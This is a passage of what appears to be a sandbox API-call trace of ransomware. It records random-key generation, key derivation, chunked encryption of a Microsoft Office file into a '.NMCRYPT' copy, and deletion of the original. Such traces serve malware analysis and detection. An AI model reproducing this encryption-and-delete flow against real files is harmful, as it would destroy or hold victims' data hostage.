pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.158] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.159] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.160] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.160] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.161] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0146.161] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.161] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad438) returned 1 [0146.161] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0146.161] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0146.161] wcslen (_String="\\\\?\\") returned 0x4 [0146.161] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad578) returned 1 [0146.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0146.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0146.161] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2436) returned 1 [0146.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0146.162] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.174] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.174] GetLastError () returned 0x0 [0146.174] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.194] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.194] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.194] GetLastError () returned 0x0 [0146.194] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.194] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.194] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.194] GetLastError () returned 0x0 [0146.194] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.194] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.194] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.194] GetLastError () returned 0x0 [0146.194] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.194] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.194] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.194] GetLastError () returned 0x0 [0146.194] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.194] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.194] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.194] GetLastError () returned 0x0 [0146.195] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.195] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.195] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.195] GetLastError () returned 0x0 [0146.195] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.195] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.195] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.195] GetLastError () returned 0x0 [0146.195] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.195] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.195] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.195] GetLastError () returned 0x0 [0146.195] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.195] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x84, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x84, lpOverlapped=0x0) returned 1 [0146.195] CryptEncrypt (in: hKey=0x9ad578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x84, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x90) returned 1 [0146.195] GetLastError () returned 0x0 [0146.195] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x90, lpOverlapped=0x0) returned 1 [0146.195] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0146.195] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0146.195] CloseHandle (hObject=0x1624) returned 1 [0146.195] CloseHandle (hObject=0x588) returned 1 [0146.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml")) returned 0x20 [0146.197] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml", dwFileAttributes=0x20) returned 0 [0146.197] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned 1 [0146.198] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml")) returned 0 [0146.198] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" [0146.198] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0146.198] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXADF4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxadf4.tmp")) returned 0xadf4 [0146.198] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), 